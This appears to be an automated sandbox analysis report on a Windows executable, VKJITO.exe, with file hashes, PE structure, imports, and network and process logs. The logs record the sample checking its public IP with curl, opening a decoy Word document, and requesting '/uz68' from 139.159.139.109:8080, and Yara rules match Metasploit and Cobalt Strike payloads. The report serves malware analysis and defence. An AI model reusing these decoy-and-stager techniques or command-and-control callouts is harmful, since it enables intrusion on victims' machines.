                                        Category:dropped
                                        Size (bytes):12
                                        Entropy (8bit):0.41381685030363374
                                        Encrypted:false
                                        SSDEEP:3:/l:
                                        MD5:E4A1661C2C886EBB688DEC494532431C
                                        SHA1:A2AE2A7DB83B33DC95396607258F553114C9183C
                                        SHA-256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
                                        SHA-512:EFDCB76FB40482BC94E37EAE3701E844BF22C7D74D53AEF93AC7B6AE1C1094BA2F853875D2C66A49A7075EA8C69F5A348B786D6EE0FA711669279D04ADAAC22C
                                        Malicious:false
                                        Preview:............

                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UZ114E0ZURV2K5J9QCS3.temp

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):12
                                        Entropy (8bit):0.41381685030363374
                                        Encrypted:false
                                        SSDEEP:3:/l:
                                        MD5:E4A1661C2C886EBB688DEC494532431C
                                        SHA1:A2AE2A7DB83B33DC95396607258F553114C9183C
                                        SHA-256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
                                        SHA-512:EFDCB76FB40482BC94E37EAE3701E844BF22C7D74D53AEF93AC7B6AE1C1094BA2F853875D2C66A49A7075EA8C69F5A348B786D6EE0FA711669279D04ADAAC22C
                                        Malicious:false
                                        Preview:............

                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms (copy)

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):12
                                        Entropy (8bit):0.41381685030363374
                                        Encrypted:false
                                        SSDEEP:3:/l:
                                        MD5:E4A1661C2C886EBB688DEC494532431C
                                        SHA1:A2AE2A7DB83B33DC95396607258F553114C9183C
                                        SHA-256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
                                        SHA-512:EFDCB76FB40482BC94E37EAE3701E844BF22C7D74D53AEF93AC7B6AE1C1094BA2F853875D2C66A49A7075EA8C69F5A348B786D6EE0FA711669279D04ADAAC22C
                                        Malicious:false
                                        Preview:............

                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms~RF253c3.TMP (copy)

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):12
                                        Entropy (8bit):0.41381685030363374
                                        Encrypted:false
                                        SSDEEP:3:/l:
                                        MD5:E4A1661C2C886EBB688DEC494532431C
                                        SHA1:A2AE2A7DB83B33DC95396607258F553114C9183C
                                        SHA-256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
                                        SHA-512:EFDCB76FB40482BC94E37EAE3701E844BF22C7D74D53AEF93AC7B6AE1C1094BA2F853875D2C66A49A7075EA8C69F5A348B786D6EE0FA711669279D04ADAAC22C
                                        Malicious:false
                                        Preview:............

                                        C:\Users\user\Desktop\???????.docx

                                        Download File
                                        Process:C:\Users\user\Desktop\VKJITO.exe
                                        File Type:Microsoft Word 2007+
                                        Category:dropped
                                        Size (bytes):11302
                                        Entropy (8bit):7.78963878169505
                                        Encrypted:false
                                        SSDEEP:192:oxrJWWLa/DWjTFQEnxkC7X8t53ZGND1FHGtShPjF3LyvyOmBKOEJrmsvAM3cO:oxrvm/SjTCsxH7X+pGND19GtUPpoxJO2
                                        MD5:FD69658D599611807EE4B8F3E42531BC
                                        SHA1:712DF7C90458621F01D3045EBAAF76455CDF279B
                                        SHA-256:3AFD75C39B4563F333B32F9D5C1119A84FF67596974E9C6B7AC59C7902F1CA81
                                        SHA-512:1893470F3E15A3FFC21F928D6EA1B8C2A59F8353D3ADBC0EA03A8697A5BDC2E0ACF544FAC55EA75A8E93F179EF0D771F352CE2687CBBB103EF3261939A1DD62B
                                        Malicious:false
                                        Preview:PK.........N.@................docProps/PK.........N.@O{Mm\...q.......docProps/app.xml..Qo.0....?....)...i.L..h.r.f.6m5..WdQ...{.mO....m.3h.H.(.....c.o.u0.=c..h#.........FK..r0...&.kk..!.jh...Z..A.Z'....3XIvjAX.c<Ap. *..u.......7....3_.U9.....Z.>:.&..m...dC.`...~ ;.+.a....5.Y.O.9P..w....4=j..9P...6%o.;...`....f... .at..f.J..........P..@..O.J5.Q...v....u.....F......m....A<...x.T.2J..'y2.S..|I.0..R.`'..{.P.O.W...PK.........N.@....=...[.......docProps/core.xml...N.0.E.H.C.}.<..$..uE%$.x.,{.Z...........,.{......^..'X'..P..(..4.....f._..y.8m......e}yQ2C...`.....(..#.Th.!.;..I]..*.[m%..h.l({...<M.X...z.{`l&"...MH.a......$(.p.d....J.g...9....f..9;..{..d...!F.....0j,T.V.P]r6.#...... .v'...P...,..8..9).2..J|r..=...^...uo.n.u...u..V..9.+PM...S49...mF..Y..........PK.........N.@.&..*...........docProps/custom.xml...K.0....C.=...2.5]A<(..Ji..&%I.C...S<x.......{/Y..}p..vZ.....R.....O.%\...J5U..L.QZ....{.Gi\'m...`..D..{9T6...I..P9_...m....4H...8F.d......g..

                                        C:\Users\user\Desktop\~$??????.docx

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):162
                                        Entropy (8bit):4.410469841215024
                                        Encrypted:false
                                        SSDEEP:3:0sk72906xkA/mJQxOfgSRGGXTkbblSu6YgOaaRNJn:0sU22aJ+2Gkb0u6YLaaRf
                                        MD5:8136470302121CD75C9B2726C3E9B277
                                        SHA1:A5CF8F1EE9BAE1AE495CD1BB0A89DB36FB7850D0
                                        SHA-256:ABB3B667AB0BA119C9D6E843FBEA473176B4D5F3A63979CF742B1324655C90D3
                                        SHA-512:725838F57F6D99F10106AC8CDC070C996D489446E33D16E630F2CDAF856218472B2C00E309C8E82167AEED3B64E62795FCB4CC61F80C00A092B3640247264574
                                        Malicious:false
                                        Preview:..........................................................N.@|.I~b...........[Content_Types].xml...n.0.E......Ub.*..>.-....3..~.aQ........Q....}..k.....U...=.j

                                        C:\Windows\appcompat\Programs\Amcache.hve

                                        Download File
                                        Process:C:\Windows\System32\WerFault.exe
                                        File Type:MS Windows registry file, NT/2000 or above
                                        Category:dropped
                                        Size (bytes):1835008
                                        Entropy (8bit):4.416689389801054
                                        Encrypted:false
                                        SSDEEP:6144:ycifpi6ceLPL9skLmb0mLSWSPtaJG8nAgex285i2MMhA20X4WABlGuNO5+:fi58LSWIZBk2MM6AFBEo
                                        MD5:9D496CA6834E4B19FB0A81F74E2407D9
                                        SHA1:3F9B02BA666FC768305F2109D9F75093D15AAF93
                                        SHA-256:8151379EF55EB2AFB017F396AB2A4273D387EF8130BC7F8877B30AC783970811
                                        SHA-512:B71D04DD6F8C6B0A7587FC66F9AD5C13EAC2A0561589AF13EA6EE1FA393B8D46274B4ECC8314FAD9567C96F67219B23FF98EE8594150D7C1DDCD09064C10E30B
                                        Malicious:false
                                        Preview:regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm../.aQ................................................................................................................................................................................................................................................................................................................................................8.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                        Static File Info

                                        General

                                        File type:PE32+ executable (GUI) x86-64, for MS Windows
                                        Entropy (8bit):6.476037002247636
                                        TrID:
                                        • Win64 Executable GUI (202006/5) 92.65%
                                        • Win64 Executable (generic) (12005/4) 5.51%
                                        • Generic Win/DOS Executable (2004/3) 0.92%
                                        • DOS Executable Generic (2002/1) 0.92%
                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                        File name:VKJITO.exe
                                        File size:505'856 bytes
                                        MD5:34bfa047aaca8fd4dc99759ebf0e1a6a
                                        SHA1:ae43a10d462f09aa7b945b5b37aad9c0d1df4b01
                                        SHA256:517b6b3e890f7b93e0006cd8486b778075ebcc647565d37f2186500a8ddc1ff7
                                        SHA512:aa82c0becd41cb8bd5ef45a352fcf4e7432495041d0b36687f02bb95705e61fa017b018a016c615271c7d670cef113bbe87285baebf2d0de2e845c18f1270939
                                        SSDEEP:6144:/6WW4uEbwm8kZ/w2FmOblG/h88OfGJUiuWtgPleGJEdpVNeOo:/6VYdNpmKlG5XqJGgPkG
                                        TLSH:F9B4E9316A1524B9E2EAC0744249856365397C8DD729B9FB01E4B2342FB7FF71B3A60C
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........n(^..{^..{^..{W..{R..{O&.z\..{O&.z]..{O&.zW..{O&.zI..{...zV..{...zE..{^..{'..{^..{...{.&.{_..{.&.z_..{Rich^..{...............

                                        File Icon

                                        Icon Hash:0b03084c4e4e0383

                                        Static PE Info

                                        General

                                        Entrypoint:0x14004a5b0
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x140000000
                                        Subsystem:windows gui
                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x67610374 [Tue Dec 17 04:52:04 2024 UTC]
                                        TLS Callbacks:0x4000d750, 0x1, 0x4003a6f0, 0x1
                                        CLR (.Net) Version:
                                        OS Version Major:6
                                        OS Version Minor:0
                                        File Version Major:6
                                        File Version Minor:0
                                        Subsystem Version Major:6
                                        Subsystem Version Minor:0
                                        Import Hash:e181d703c1ccac643c75df695343568f

                                        Entrypoint Preview

                                        Instruction
                                        dec eax
                                        sub esp, 28h
                                        call 00007FA33C8432F8h
                                        dec eax
                                        add esp, 28h
                                        jmp 00007FA33C842E87h
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        nop word ptr [eax+eax+00000000h]
                                        dec eax
                                        sub esp, 10h
                                        dec esp
                                        mov dword ptr [esp], edx
                                        dec esp
                                        mov dword ptr [esp+08h], ebx
                                        dec ebp
                                        xor ebx, ebx
                                        dec esp
                                        lea edx, dword ptr [esp+18h]
                                        dec esp
                                        sub edx, eax
                                        dec ebp
                                        cmovb edx, ebx
                                        dec esp
                                        mov ebx, dword ptr [00000010h]
                                        dec ebp
                                        cmp edx, ebx
                                        jnc 00007FA33C843028h
                                        inc cx
                                        and edx, 8D4DF000h
                                        wait
                                        add al, dh

                                        Rich Headers

                                        Programming Language:
                                        • [IMP] VS2008 SP1 build 30729

                                        Data Directories

                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x66f340x104.rdata
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x6c0000x10b40.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x690000x2ec8.pdata
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x7d0000x90c.reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x5f5500x54.rdata
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x5f6000x28.rdata
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x5f4100x140.rdata
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x4e0000x450.rdata
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                        Sections

                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x10000x4cb810x4cc0059e645b10daf9e13e7e0365f93b46854False0.519213151465798data6.410429474183223IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        .rdata0x4e0000x19f800x1a000d200ec812104f6b1e56c44927cc03075False0.39791165865384615data5.929914038965162IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .data0x680000x4c00x200b0a52caa26824fe2292684499e256f5cFalse0.287109375data2.3402856607159674IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .pdata0x690000x2ec80x30002f14aae3a7cccffffd7fde4a327f957bFalse0.50146484375data5.598549220182398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .rsrc0x6c0000x10b400x10c00c9ba3dce4a01b0233a1ee90428fde01fFalse0.06862173507462686data4.631565874341215IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .reloc0x7d0000x90c0xa0005d74b2675f47a61dea3c5e26b019d48False0.5828125data5.226710425977709IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                        Resources

                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                        RT_ICON0x6c0e80x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 15118 x 15118 px/mEnglishUnited States0.06374955637051934
                                        RT_GROUP_ICON0x7c9100x14dataEnglishUnited States1.15
                                        RT_VERSION0x7c9240x21cdataEnglishUnited States0.5148148148148148

                                        Imports

                                        DLLImport
                                        bcrypt.dllBCryptGenRandom
                                        KERNEL32.dllSetLastError, lstrlenW, GetModuleHandleW, FormatMessageW, HeapAlloc, GetProcessHeap, GetCurrentDirectoryW, RtlCaptureContext, RtlLookupFunctionEntry, WaitForSingleObjectEx, LoadLibraryA, GetCurrentProcess, GetCurrentProcessId, CreateMutexA, ReleaseMutex, RtlVirtualUnwind, WideCharToMultiByte, GetEnvironmentVariableW, CreateFileW, SetFileInformationByHandle, IsDebuggerPresent, VirtualProtect, VirtualAlloc, ConvertThreadToFiber, CreateFiber, SwitchToFiber, ReleaseSRWLockExclusive, FreeEnvironmentStringsW, DeleteProcThreadAttributeList, CompareStringOrdinal, QueryPerformanceCounter, AcquireSRWLockExclusive, GetEnvironmentStringsW, DuplicateHandle, WriteFileEx, SleepEx, GetExitCodeProcess, TryAcquireSRWLockExclusive, QueryPerformanceFrequency, AcquireSRWLockShared, ReleaseSRWLockShared, CreateEventW, ReadFile, GetOverlappedResult, CancelIo, GetLastError, GetProcAddress, ExitProcess, GetFullPathNameW, CreateNamedPipeW, ReadFileEx, WaitForMultipleObjects, GetSystemDirectoryW, GetWindowsDirectoryW, CreateProcessW, GetFileAttributesW, InitializeProcThreadAttributeList, UpdateProcThreadAttribute, CreateThread, GetSystemTimeAsFileTime, HeapReAlloc, GetModuleHandleA, WriteConsoleW, MultiByteToWideChar, GetConsoleMode, GetModuleFileNameW, HeapFree, GetCurrentThread, SetThreadStackGuarantee, AddVectoredExceptionHandler, Sleep, CloseHandle, WaitForSingleObject, SetWaitableTimer, SetUnhandledExceptionFilter, CreateWaitableTimerExW, UnhandledExceptionFilter, InitializeSListHead, GetCurrentThreadId, GetStdHandle, IsProcessorFeaturePresent
                                        ADVAPI32.dllRegQueryValueExW, SystemFunction036, RegCloseKey, RegOpenKeyExW
                                        api-ms-win-core-synch-l1-2-0.dllWakeByAddressAll, WakeByAddressSingle, WaitOnAddress
                                        ntdll.dllRtlNtStatusToDosError, NtReadFile, NtWriteFile
                                        VCRUNTIME140.dll__current_exception, __C_specific_handler, __current_exception_context, memmove, __CxxFrameHandler3, memset, memcmp, memcpy, _CxxThrowException
                                        api-ms-win-crt-string-l1-1-0.dllstrlen
                                        api-ms-win-crt-heap-l1-1-0.dllfree, _set_new_mode
                                        api-ms-win-crt-math-l1-1-0.dll__setusermatherr
                                        api-ms-win-crt-runtime-l1-1-0.dll__p___argv, __p___argc, _cexit, exit, _initterm_e, _initterm, _get_initial_narrow_environment, _initialize_narrow_environment, _configure_narrow_argv, _c_exit, _set_app_type, _seh_filter_exe, _register_thread_local_exe_atexit_callback, terminate, _crt_atexit, _initialize_onexit_table, _register_onexit_function, _exit
                                        api-ms-win-crt-stdio-l1-1-0.dll__p__commode, _set_fmode
                                        api-ms-win-crt-locale-l1-1-0.dll_configthreadlocale

                                        Possible Origin

                                        Language of compilation systemCountry where language is spokenMap
                                        EnglishUnited States

                                        Network Behavior

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Dec 18, 2024 16:30:08.677205086 CET4970380192.168.2.7104.26.13.31
                                        Dec 18, 2024 16:30:08.797432899 CET8049703104.26.13.31192.168.2.7
                                        Dec 18, 2024 16:30:08.797523975 CET4970380192.168.2.7104.26.13.31
                                        Dec 18, 2024 16:30:08.797844887 CET4970380192.168.2.7104.26.13.31
                                        Dec 18, 2024 16:30:08.917313099 CET8049703104.26.13.31192.168.2.7
                                        Dec 18, 2024 16:30:09.988233089 CET8049703104.26.13.31192.168.2.7
                                        Dec 18, 2024 16:30:10.007034063 CET4970380192.168.2.7104.26.13.31
                                        Dec 18, 2024 16:30:10.128218889 CET8049703104.26.13.31192.168.2.7
                                        Dec 18, 2024 16:30:10.128294945 CET4970380192.168.2.7104.26.13.31
                                        Dec 18, 2024 16:30:11.590065956 CET497058080192.168.2.7139.159.139.109
                                        Dec 18, 2024 16:30:11.709623098 CET808049705139.159.139.109192.168.2.7
                                        Dec 18, 2024 16:30:11.709692955 CET497058080192.168.2.7139.159.139.109
                                        Dec 18, 2024 16:30:11.709899902 CET497058080192.168.2.7139.159.139.109
                                        Dec 18, 2024 16:30:11.829567909 CET808049705139.159.139.109192.168.2.7
                                        Dec 18, 2024 16:30:16.584249020 CET808049705139.159.139.109192.168.2.7
                                        Dec 18, 2024 16:30:16.584481955 CET497058080192.168.2.7139.159.139.109
                                        Dec 18, 2024 16:30:16.644712925 CET497058080192.168.2.7139.159.139.109
                                        Dec 18, 2024 16:30:16.764419079 CET808049705139.159.139.109192.168.2.7

                                        UDP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Dec 18, 2024 16:30:04.798489094 CET5759753192.168.2.71.1.1.1
                                        Dec 18, 2024 16:30:06.449596882 CET5556853192.168.2.71.1.1.1
                                        Dec 18, 2024 16:30:08.444231987 CET5011753192.168.2.71.1.1.1
                                        Dec 18, 2024 16:30:08.671709061 CET53501171.1.1.1192.168.2.7

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        Dec 18, 2024 16:30:04.798489094 CET192.168.2.71.1.1.10x7b31Standard query (0)time.windows.comA (IP address)IN (0x0001)false
                                        Dec 18, 2024 16:30:06.449596882 CET192.168.2.71.1.1.10x33e5Standard query (0)time.windows.comA (IP address)IN (0x0001)false
                                        Dec 18, 2024 16:30:08.444231987 CET192.168.2.71.1.1.10x2cbcStandard query (0)ip.sbA (IP address)IN (0x0001)false

                                        DNS Answers

                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Dec 18, 2024 16:30:04.940876961 CET1.1.1.1192.168.2.70x7b31No error (0)time.windows.comtwc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                        Dec 18, 2024 16:30:06.586924076 CET1.1.1.1192.168.2.70x33e5No error (0)time.windows.comtwc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                        Dec 18, 2024 16:30:08.671709061 CET1.1.1.1192.168.2.70x2cbcNo error (0)ip.sb104.26.13.31A (IP address)IN (0x0001)false
                                        Dec 18, 2024 16:30:08.671709061 CET1.1.1.1192.168.2.70x2cbcNo error (0)ip.sb172.67.75.172A (IP address)IN (0x0001)false
                                        Dec 18, 2024 16:30:08.671709061 CET1.1.1.1192.168.2.70x2cbcNo error (0)ip.sb104.26.12.31A (IP address)IN (0x0001)false
                                        Dec 18, 2024 16:30:19.142230988 CET1.1.1.1192.168.2.70x8f29No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comdefault.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comCNAME (Canonical name)IN (0x0001)false
                                        Dec 18, 2024 16:30:19.142230988 CET1.1.1.1192.168.2.70x8f29No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com212.229.88.4A (IP address)IN (0x0001)false
                                        Dec 18, 2024 16:30:19.142230988 CET1.1.1.1192.168.2.70x8f29No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com212.229.88.13A (IP address)IN (0x0001)false
                                        Dec 18, 2024 16:30:19.142230988 CET1.1.1.1192.168.2.70x8f29No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com212.229.88.27A (IP address)IN (0x0001)false
                                        Dec 18, 2024 16:30:19.142230988 CET1.1.1.1192.168.2.70x8f29No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com212.229.88.19A (IP address)IN (0x0001)false
                                        Dec 18, 2024 16:30:19.142230988 CET1.1.1.1192.168.2.70x8f29No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com212.229.88.5A (IP address)IN (0x0001)false
                                        Dec 18, 2024 16:30:35.463352919 CET1.1.1.1192.168.2.70xa82fNo error (0)templatesmetadata.office.nettemplatesmetadata.office.net.edgekey.netCNAME (Canonical name)IN (0x0001)false

                                        HTTP Request Dependency Graph

                                        • ip.sb
                                        • 139.159.139.109:8080

                                        HTTP Packets

                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.749703104.26.13.31807396C:\Windows\System32\curl.exe
                                        TimestampBytes transferredDirectionData
                                        Dec 18, 2024 16:30:08.797844887 CET69OUTGET / HTTP/1.1
                                        Host: ip.sb
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Dec 18, 2024 16:30:09.988233089 CET782INHTTP/1.1 200 OK
                                        Date: Wed, 18 Dec 2024 15:30:09 GMT
                                        Content-Type: text/plain
                                        Content-Length: 13
                                        Connection: keep-alive
                                        Cache-Control: no-cache
                                        cf-cache-status: DYNAMIC
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T7yP5f6SgpoF%2BeEwIN6B%2BUDk%2FfL5PvD9TAxD2l24CbqLowd4AyauyJaS2Gyh39lxwRLn%2FeOcLL42EqyEQHhWXj5PXLbfEoSm4ILivf770%2Fq15volpeLg"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8f40314adaeb8c0b-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        server-timing: cfL4;desc="?proto=TCP&rtt=1804&min_rtt=1804&rtt_var=902&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=69&delivery_rate=0&cwnd=204&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                        Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39 0a
                                        Data Ascii: 8.46.123.189


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        1192.168.2.749705139.159.139.10980807380C:\Users\user\Desktop\VKJITO.exe
                                        TimestampBytes transferredDirectionData
                                        Dec 18, 2024 16:30:11.709899902 CET163OUTGET /uz68 HTTP/1.1
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
                                        Host: 139.159.139.109:8080
                                        Connection: Keep-Alive
                                        Cache-Control: no-cache


                                        Statistics

                                        CPU Usage

                                        Click to jump to process

                                        Memory Usage

                                        Click to jump to process

                                        High Level Behavior Distribution

                                        Click to dive into process behavior distribution

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        General

                                        Target ID:0
                                        Start time:10:30:07
                                        Start date:18/12/2024
                                        Path:C:\Users\user\Desktop\VKJITO.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Users\user\Desktop\VKJITO.exe"
                                        Imagebase:0x7ff73a590000
                                        File size:505'856 bytes
                                        MD5 hash:34BFA047AACA8FD4DC99759EBF0E1A6A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000000.00000002.2082162177.00000266E7A40000.00000010.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.2082162177.00000266E7A40000.00000010.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000002.2082162177.00000266E7A40000.00000010.00001000.00020000.00000000.sdmp, Author: unknown
                                        • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000002.2082162177.00000266E7A40000.00000010.00001000.00020000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000000.00000002.2082182507.00000266E7A5C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.2082182507.00000266E7A5C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000002.2082182507.00000266E7A5C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                        • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000002.2082182507.00000266E7A5C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:1
                                        Start time:10:30:07
                                        Start date:18/12/2024
                                        Path:C:\Windows\System32\curl.exe
                                        Wow64 process (32bit):false
                                        Commandline:"curl" ip.sb
                                        Imagebase:0x7ff699c10000
                                        File size:530'944 bytes
                                        MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        General

                                        Target ID:2
                                        Start time:10:30:07
                                        Start date:18/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff75da10000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:4
                                        Start time:10:30:09
                                        Start date:18/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:"cmd" /c start C:\Users\user\Desktop\???????.docx
                                        Imagebase:0x7ff655370000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:5
                                        Start time:10:30:09
                                        Start date:18/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff75da10000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:7
                                        Start time:10:30:10
                                        Start date:18/12/2024
                                        Path:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\Desktop\???????.docx" /o ""
                                        Imagebase:0x910000
                                        File size:1'620'872 bytes
                                        MD5 hash:1A0C2C2E7D9C4BC18E91604E9B0C7678
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:false

                                        General

                                        Target ID:12
                                        Start time:10:30:16
                                        Start date:18/12/2024
                                        Path:C:\Windows\System32\WerFault.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\WerFault.exe -u -p 7380 -s 1164
                                        Imagebase:0x7ff6411c0000
                                        File size:570'736 bytes
                                        MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
